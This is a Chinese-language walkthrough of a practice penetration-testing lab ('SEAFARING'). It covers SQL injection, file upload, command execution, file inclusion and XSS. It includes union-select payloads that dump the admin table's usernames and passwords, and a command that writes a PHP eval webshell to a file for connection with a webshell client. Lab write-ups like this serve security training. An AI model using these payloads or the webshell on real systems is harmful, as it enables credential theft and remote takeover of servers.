SEAFARING靶场渗透

一.SQL注入漏洞

1.输入id=1 --+ 下方出现数据说明闭合成功

2.测试得出数据库有三列

3.三处都是回显点

4.联合查询爆出库名

5.查表名

?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='test'--+

6.查字段名

?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='test' and table_name='admin'--+

7. 查出用户名和密码

?id=-1 union select 1,group_concat(user_name,'~',user_pass),3 from admin--+

二.文件上传漏洞

1.用我们刚才获取的用户名和密码登录后发现可以上传文件

2.上传一句话木马进去

3.将文件地址拼接到网址后进行访问

4.使用蚁剑连接

三.命令执行漏洞

1.网址下方的输入框提示我们可以执行命令

2.尝试输入ls有效

3.借助这个漏洞我们写一句话木马到888.php 并访问

echo '<?php @eval($_POST[cmd]);?>' > 888.php

4.复制地址用蚁剑连接

四.文件包含漏洞

1.修改刚才传入的888.php内容为phpinfo();重新上传访问后发现远程文件包含是关闭的,只能使用本地文件包含

2.访问php文件复制地址蚁剑连连接即可

五.XSS漏洞

在登录框中测试有没有XSS漏洞,成功弹窗

相关推荐
user_admin_god39 分钟前
企业级管理系统的站内信怎么轻量级优雅实现
java·大数据·数据库·spring boot
百***22121 小时前
mysql的分区表
数据库·mysql
humors2211 小时前
服务端开发案例(不定期更新)
java·数据库·后端·mysql·mybatis·excel
Wang's Blog2 小时前
MySQL: 服务器性能优化全面指南:参数配置与数据库设计的最佳实践
服务器·数据库·mysql
码农101号2 小时前
Mysql主从架构的搭建
数据库·mysql·架构
cqsztech2 小时前
ORACLE数据库中如何找到过去某个时间某个表被谁修改了
数据库·oracle
好记忆不如烂笔头abc2 小时前
sql评估存储的速度和稳定性
数据库·sql
小鹏linux2 小时前
《openGauss安全架构与数据全生命周期防护实践:从技术体系到行业落地》
数据库·opengauss·gaussdb
朝新_3 小时前
【实战】动态 SQL + 统一 Result + 登录校验:图书管理系统(下)
xml·java·数据库·sql·mybatis
装不满的克莱因瓶3 小时前
什么是脏读、幻读、不可重复读?Mysql的隔离级别是什么?
数据库·mysql·事务·隔离级别·不可重复读·幻读·脏读